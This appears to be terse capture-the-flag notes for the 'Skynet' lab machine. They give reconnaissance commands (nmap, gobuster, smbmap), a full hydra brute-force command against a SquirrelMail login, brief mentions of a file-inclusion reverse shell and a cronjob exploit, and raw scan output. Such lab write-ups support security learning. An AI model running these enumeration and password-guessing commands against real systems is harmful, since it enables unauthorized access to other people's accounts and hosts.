Skynet | nmap, smbmap, hydra

A vulnerable Terminator themed Linux machine.

yes

  1. enumerate ports using nmap
    • nmap -sC -sV <ip>
  2. enumerate directories using gobuster
    • gobuster dir -u 10.10.220.146:80 -w /usr/share/wordlists/dirbuster/directory-list-1.0.txt
  3. enumerate smbshares using nmap and smbmap
    • smbmap.py -H 10.10.220.146
    • nmap --script=smb-enum-shares.nse,smb-enum-users.nse -p 445 10.10.220.146
  4. log into anonymous smb share
  5. get log files
  6. use hydra to try passwords for email
    • hydra -l milesdyson -P log1.txt 10.10.220.146 http-post-form "/squirrelmail/src/redirect.php:login_username=^USER^&secretkey=^PASS^&js_autodetect_results=1&just_logged_in=1:Unknown user or password incorrect."
  7. log into miles share wiht miles as user and his password
  8. find file with new directory
  9. find admin page of that dir
  10. run remote file inclusion exploit with reverse shell
  11. find cronjob on system
  12. exploit
  13. ???
  14. profit
PORT    STATE SERVICE     VERSION
22/tcp  open  ssh         OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 99:23:31:bb:b1:e9:43:b7:56:94:4c:b9:e8:21:46:c5 (RSA)
|   256 57:c0:75:02:71:2d:19:31:83:db:e4:fe:67:96:68:cf (ECDSA)
|_  256 46:fa:4e:fc:10:a5:4f:57:57:d0:6d:54:f6:c3:4d:fe (EdDSA)
80/tcp  open  http        Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Skynet
110/tcp open  pop3        Dovecot pop3d
|_pop3-capabilities: TOP PIPELINING CAPA RESP-CODES SASL AUTH-RESP-CODE UIDL
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
143/tcp open  imap        Dovecot imapd
|_imap-capabilities: ID LOGIN-REFERRALS more SASL-IR LOGINDISABLEDA0001 OK have capabilities post-login Pre-login listed ENABLE LITERAL+ IDLE IMAP4rev1
445/tcp open  netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
MAC Address: 02:75:65:6B:9F:19 (Unknown)
Service Info: Host: SKYNET; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_nbstat: NetBIOS name: SKYNET, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-os-discovery: 
|   OS: Windows 6.1 (Samba 4.3.11-Ubuntu)
|   Computer name: skynet
|   NetBIOS computer name: SKYNET\x00
|   Domain name: \x00
|   FQDN: skynet
|_  System time: 2023-11-03T08:27:40-05:00
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2023-11-03 13:27:40
|_  start_date: 1600-12-31 23:58:45


/admin (Status: 301)
/ai (Status: 301)
/config (Status: 301)
/squirrelmail` (Status: 301)
/css (Status: 301)
/js (Status: 301)


Host script results:
| smb-enum-shares: 
|   account_used: guest
|   \\10.10.220.146\IPC$: 
|     Type: STYPE_IPC_HIDDEN
|     Comment: IPC Service (skynet server (Samba, Ubuntu))
|     Users: 2
|     Max Users: <unlimited>
|     Path: C:\tmp
|     Anonymous access: READ/WRITE
|     Current user access: READ/WRITE
|   \\10.10.220.146\anonymous: 
|     Type: STYPE_DISKTREE
|     Comment: Skynet Anonymous Share
|     Users: 0
|     Max Users: <unlimited>
|     Path: C:\srv\samba
|     Anonymous access: READ/WRITE
|     Current user access: READ/WRITE
|   \\10.10.220.146\milesdyson: 
|     Type: STYPE_DISKTREE
|     Comment: Miles Dyson Personal Share
|     Users: 0
|     Max Users: <unlimited>
|     Path: C:\home\milesdyson\share
|     Anonymous access: <none>
|     Current user access: <none>
|   \\10.10.220.146\print$: 
|     Type: STYPE_DISKTREE
|     Comment: Printer Drivers
|     Users: 0
|     Max Users: <unlimited>
|     Path: C:\var\lib\samba\printers
|     Anonymous access: <none>
|_    Current user access: <none>
| smb-enum-users: 
|   SKYNET\milesdyson (RID: 1000)
|     Full name:   
|     Description: 
|_    Flags:       Normal user account


Disk                                                  	Permissions	Comment
----                                                  	-----------	-------
print$                                            	NO ACCESS	Printer Drivers
anonymous                                         	READ ONLY	Skynet Anonymous Share
milesdyson                                        	NO ACCESS	Miles Dyson Personal Share
IPC$                                              	NO ACCESS	IPC Service (skynet server (Samba, Ubuntu))
Last modified 2023.11.03